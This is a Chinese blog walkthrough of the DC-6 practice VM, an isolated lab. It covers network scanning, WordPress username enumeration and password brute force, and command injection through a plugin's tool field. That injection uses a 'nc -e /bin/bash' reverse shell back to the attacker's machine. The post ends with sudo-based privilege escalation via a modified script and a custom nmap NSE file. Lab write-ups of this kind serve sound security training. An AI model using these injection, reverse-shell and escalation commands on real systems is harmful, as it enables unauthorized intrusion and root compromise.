Neos的渗透测试靶机练习——DC-6

最新推荐文章于 2024-07-07 17:22:02 发布
最新推荐文章于 2024-07-07 17:22:02 发布
阅读量934 收藏 22
点赞数 23
分类专栏: 靶场练习 文章标签: 渗透测试 安全 网络安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38678845/article/details/135514431
版权

DC-5

一、实验环境

虚拟机软件:VirtualBox
攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
靶机:DC-6(网卡初始为仅主机模式,要有安全意识)

二、开始渗透

1. 搜集信息

输入sudo su,将kali切换到root权限
切root权限
输入ifconfig查询自身ip,即攻击机ip
查自身ip
可以看到自身ip192.168.56.101,对应的网卡名称为eth0
本次渗透我们选择输入netdiscover -i eth0扫描本网段存活主机,即靶机ip地址
靶机ip
可以看到靶机ip192.168.56.113,。
输入nmap -sV -p- 192.168.56.113,查看靶机端口开放信息
靶机端口
看到开放了22端口80端口
浏览器输入192.168.56.113:80,遇到了和DC-2一样的现象,无法显示,且域名变为了wordy
无法显示
这里需要修改hosts文件解决无法解析的问题。
修改hosts文件
重新打开网页,可以显示内容了。
网站内容
命令行输入whatweb 192.168.56.113查询网站指纹信息。
网站指纹
可以看到Apache、linux、JQuery、WordPress等的版本信息,其中WordPress是一个内容管理系统(CMS),版本为5.1.1
命令行输入dirsearch -u http://wordy,查询网站目录
网站目录
等待一会儿,发现了后台登陆界面http://wordy/wp-admin/
后台登陆界面

2. 暴力破解

命令行输入wpscan --url http://wordy -e u,爆破用户名。
爆破用户名
爆破出来几个用户名,adminmarkgrahamsarahjens
继续爆破密码,先将这五个用户名写入一个user.txt文件中,
然后输入wpscan --url http://wordy/ -U user.txt -P /usr/share/wordlists/rockyou.txt(这里需提前将rockyou.txt.gz解压,输入 gunzip /usr/share/wordlists/rockyou.txt.gz即可),等了很长很长很长的时间,出来结果。
用户名密码
输入用户名mark和密码helpdesk01登陆后台。
后台

3. 找注入点

大海捞针,发现Activity monitor板块的tool功能栏存在注入点。
命令注入
使用burp抓包,将baidu.com写为baidu.com|date, | 是linux中的管道符
发现存在注入。
抓包
这里我们利用该漏洞直接nc反弹shell。
命令行输入nc -lvvp 4444
burp输入baidu.com|nc -e /bin/bash 192.168.56.101 4444后发送,反弹成功。
反弹shell

4. 提权

输入python -c 'import pty;pty.spawn("/bin/bash")'切换为交互式shell。
交互式shell
/home/mark/stuff目录中,发现一个things-to-do.txt文件。
thingtodo
其中发现用户graham的密码,使用ssh登陆,输入ssh graham@192.168.56.113
graham
输入sudo -l查看是否存在以其他用户权限执行的命令。
jens
发现/home/jens/目录下有一个可免密执行的文件。
jens的文件
只可以用jens用户才可以执行,先在该文件中写入echo '/bin/bash' >> backups.sh
这样以jens用户执行的时候就可以执行此条命令拿到jens的shell了。
输入sudo -u jens ./backups.sh,执行成功。
jens的shell
继续输入sudo -l,发现可以以root权限运行nmap
root执行nmap
nmap可以打开文件,那么我们写一个提权的文件,然后nmap运行即可。
输入echo "os.execute('/bin/bash')">neosD.nse,编写一个neosD.nse文件,.nse文件是nmap执行文件的格式。
提权语句
然后执行sudo nmap --script=/home/jens/neosD.nse,提权成功。
提权成功
进入/root目录,找到最终flag。
最终flag
至此,渗透结束。

三、总结

我们已经渐入佳境,因为我们用到了很多之前渗透所用的姿势,慢慢的,渗透测试会成为一种体力活,而不是技术活。当然了,对于现在,每一次新的渗透都是一堆没学过的新的知识,希望大家能知其然,亦知其所以然,渗透结束了,可是其中大量的为什么需要你私下去思考并解决,学的只是思路,但是为什么这个思路,为什么用这个工具,还需要多多琢磨。

Dr.Neos
关注
  • 23
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
neos-simple-editor-extend:通过YAML-Configuration扩展Neos CKEditor的简单方法
05-14
composer require breadlesscode/neos-simple-editor-extend --no-update --no-update命令可防止自动更新依赖关系。 将软件包添加到主题composer.json后,请返回Neos安装的根目录并运行composer更新。 现
neos-normalize:@neos21neos-normalize
05-31
Neo 的标准化:@ neos21 / neos-normalize 基于Normalize.css的思想,制定与Windows、Mac、iOS最新浏览器的最小必要规范化样式。我们不会完全统一所有元素的样式,而是仅对经常使用的元素进行最小样式化。 演示 ...
DC-6靶场渗透
一纸荒芜的博客
01-16 1188
DC6靶场渗透
Neos渗透测试靶机练习——DC-3
qq_38678845的博客
01-08 984
一次渗透测试练习
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
rumil的博客
04-20 882
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
Neos渗透测试靶机练习——DC-2
qq_38678845的博客
01-07 607
一个渗透测试靶机练习
Neos渗透测试靶机练习——DC-4
qq_38678845的博客
01-09 854
一次渗透测试练习
neos-development-collection:包含Neos核心软件包的统一存储库,用于Neos开发
05-12
贡献如果您想为Neos做出贡献并想建立一个开发环境,请按照以下步骤操作: composer create-project neos/neos-development-distribution neos-development dev-master --keep-vcs 请注意,您从中创建项目的-...
CM.Neos.ThemeModule:自定义支持的Neos主题
05-16
在您的站点包中运行composer require --no-update cm/neos-thememodule 在您的项目中运行composer update 。 如果没有安装该软件包,则因为您的站点软件包不是通过composer管理的,因此您需要在项目根目录中再次
neos-ui-extensibility-examples:Neos UI可扩展性示例
05-14
git clone git@github.com:neos/neos-ui-extensibility-examples.git Neos.Neos.Ui.ExtensibilityExamples cd ../../ ./flow flow:package:rescan 如何建立范例 目前,这些示例仅适用于纱线,不适用于NPM安装。 转...
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 528
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
绝区肆--2024 年AI安全状况
最新发布
RamendeusStudio的博客
07-07 364
随着人工智能系统变得越来越强大和普及,与之相关的安全问题也越来越多。让我们来看看 2024 年人工智能安全的现状——评估威胁、分析漏洞、审查有前景的防御策略,并推测这一关键领域的未来可能如何。
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 260
亚信安全发布2024年6月威胁态势
Conmi的正确答案——ESP32-C3开启安全下载模式
Conmi的博客
07-03 332
IDF版本:4.4.7。
Akamai+Noname强强联合 | API安全再加强
AKAMAI_CHINA的博客
07-03 1096
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的客户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足客户可能提出的,与业务、集成或部署要求有关的任何问题。
[图解]SysML和EA建模住宅安全系统-09-流程指南·分析系统需求
rolt的专栏
07-04 829
然后这一步,你看,这里有个决策点
FMEA在大型光伏电站安全生产管理中的应用
tianxingjian713的博客
07-03 432
它通过对产品或过程中可能出现的故障模式进行系统性地梳理和分析,评估其可能的影响程度和发生概率,从而制定相应的预防措施和应对措施,以降低故障发生的可能性和影响程度。FMEA在光伏电站安全生产管理中的应用,主要是通过对电站系统、设备和工艺过程进行全面的故障分析,找出潜在的故障模式和影响,进而制定针对性的预防措施,提高电站的安全性和可靠性。然后,针对每个子系统和设备,分析其可能出现的故障模式及其影响,包括故障对电站运行的影响、对人员安全的影响以及对环境的影响等。在评估故障影响的基础上,需要制定相应的预防措施。
WebKit中的安全新纪元:Web Authentication API深度解析
2401_85763639的博客
07-03 688
Web Authentication API是一种新兴的Web标准,旨在使用公钥密码学提供更安全的登录和多因素认证方法。与传统的用户名和密码认证方式相比,WebAuthn提供了一种无密码的认证机制,从而减少了密码泄露和钓鱼攻击的风险。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值